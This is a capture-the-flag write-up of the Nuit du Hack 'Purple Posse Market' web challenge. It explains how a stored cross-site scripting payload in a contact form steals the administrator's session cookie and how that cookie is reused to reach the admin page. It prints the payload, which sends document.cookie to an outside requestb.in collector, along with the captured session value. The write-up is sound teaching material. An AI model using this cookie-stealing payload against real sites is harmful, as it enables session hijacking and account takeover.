NDH qualifications’ write-up : Purple Posse Market challenge

CERT-DVT Writeups

Purple Posse Market was a Web Challenge where you had to steal the administrator’s personal information. This challenge deals with an application of cross site scripting attack.

Description:

You work for the government in the forensic department, you are investigating an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the  website’s amdinistrator.

URL: http://purplepossemarket.quals.nuitduhack.com/

Figure 1: Main page

This website looks like a simple store where you can order drugs, weapons and purple stuff !
There is also a Contact page where you can send an email to the administrator.

Figure 2: The administrator is currently online

The first thing that you might thinking about for this contact page is cookie stealing.
So let’s try to inject some JavaScript code into this message viewed by the admin. The admin will see the message containing the xss and will be redirected to our webpage with his cookie in the URL.


Figure 4: <script>document.write(‘<IMG SRC=\”http://requestb.in/xxxxxxxx?cookie=’+document.cookie+’\”>Hacked</IMG>’) ;</script>

A few seconds later the administrator visits our resquestb.in url which tells us that our XSS worked perfectly.
We now have the cookie “connect.sid” who belong to the administrator:

 s%3A7h5vTum7qxyriWA7ntDvn5i7g6UADEYg.eWcNTJgmIe5mzTeoENWbrLK%2BRpV%2B8Poukdg3e%2BwHjVk

Let’s use this cookie and try to access the admin web page with this http header:

Finally we obtained this page:

Figure 4: http://purplepossemarket.quals.nuitduhack/admin

Which quite simply gives us the Flag: IBAN FR14 2004 1010 0505 0001 3M02 606

Many thanks to Sysdream for having organized this event.